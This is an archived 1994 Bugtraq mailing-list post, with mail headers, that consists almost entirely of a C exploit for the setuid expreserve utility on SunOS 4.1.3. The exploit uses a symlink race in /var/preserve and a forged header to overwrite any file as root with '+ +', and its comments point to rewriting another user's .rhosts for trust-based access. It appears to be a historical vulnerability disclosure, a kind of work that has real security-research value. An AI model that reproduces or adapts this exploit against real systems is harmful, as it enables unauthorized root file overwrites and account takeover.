home | help | back | first | fref | pref | prev | next | nref | lref | last | post |
Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA1591; Mon, 3 Oct 94 00:23:38 EDT Received: from villa.fc.net by MIT.EDU with SMTP id AA27474; Mon, 3 Oct 94 00:23:36 EDT Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net 8.6.8.1/8.6.6) with ESMTP id PAA00219 for <bugtraq-outgoing@villa.fc.net>; Sun, 2 Oct 1994 15:44:22 -0500 Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id PAA2217 for bugtraq-outgoing@villa.fc.net; Sun, 2 Oct 1994 15:44:51 -0500 Received: from crimelab.crimelab.com (crimelab.crimelab.com [198.64.127.1]) by reeside.fc.net (8.6.8.1/8.6.6) with ESMTP id PAA22304 for <bugtraq@fc.net>; Sun, 2 Oct 1994 15:44:39 -0500 Received: from relay1.Hawaii.Edu (relay1.Hawaii.Edu [128.171.41.53]) by crimela.crimelab.com (8.6.9/8.6.4) with SMTP id PAA01995 for <bugtraq@crimelab.com>; Sun, 2 Oct 1994 15:40:15 -0500 Received: from uhunix.uhcc.Hawaii.Edu ([128.171.44.6]) by relay1.Hawaii.Edu wit SMTP id <11364>; Sun, 2 Oct 1994 08:18:27 -1000 Received: by uhunix.uhcc.Hawaii.Edu id <184397>; Sun, 2 Oct 1994 08:18:15 -1000 Message-Id: <94Oct2.081815hst.184397@uhunix.uhcc.Hawaii.Edu> From: Tim Newsham <newsham@uhunix.uhcc.hawaii.edu> To: bugtraq@crimelab.com Date: Sun, 2 Oct 1994 08:18:10 -1000 Sender: bugtraq-owner@crimelab.com Precedence: bulk /* * Exploit a security hole in expreserve on sun4.1.3 * <program> filename * overwrites filename as root with garbage, chown's to you * (note, a 4.1.1 test overwrote with no chown * the first 4 characters written are "+ +\n" * which can be used to overwrite anyones .rhosts as root) * * Tim N. */ #include <pwd.h> #include <fcntl.h> #define HBLKS 2 #define FNSIZE 128 #define BLKS 900 typedef struct { time_t time; int uid; int flines; char name[FNSIZE]; short Blocks[BLKS]; short encrypted; } header; main(argc,argv) int argc; char **argv; { int p,u; header H; struct passwd *pw; char buf[100],*dest; if(argc!=2) { printf("usage: %s destination\n",argv[0]); exit(1); } dest = argv[1]; p = getpid(); pw = getpwuid(getuid()); sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p); symlink(dest,buf); close(0); if(open("./Ex",O_RDWR|O_CREAT,0666)<0) { printf("Cant open Ex (temp file)\n"); exit(2); } /* fill out header so that expre thinks its legit */ H.time = 12345; /* who cares */ strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/ strcpy(H.name,"NoName"); H.flines = 0; H.uid = getuid(); H.Blocks[0] = HBLKS; H.Blocks[1] = HBLKS+1; write(0,&H,sizeof(H)); lseek(0,0,0); printf("Made temp file 'Ex'. You can remove it when done.\n"); execl("/usr/lib/expreserve","expreserve",0); printf("Couldnt exec!\n"); }
home | help | back | first | fref | pref | prev | next | nref | lref | last | post |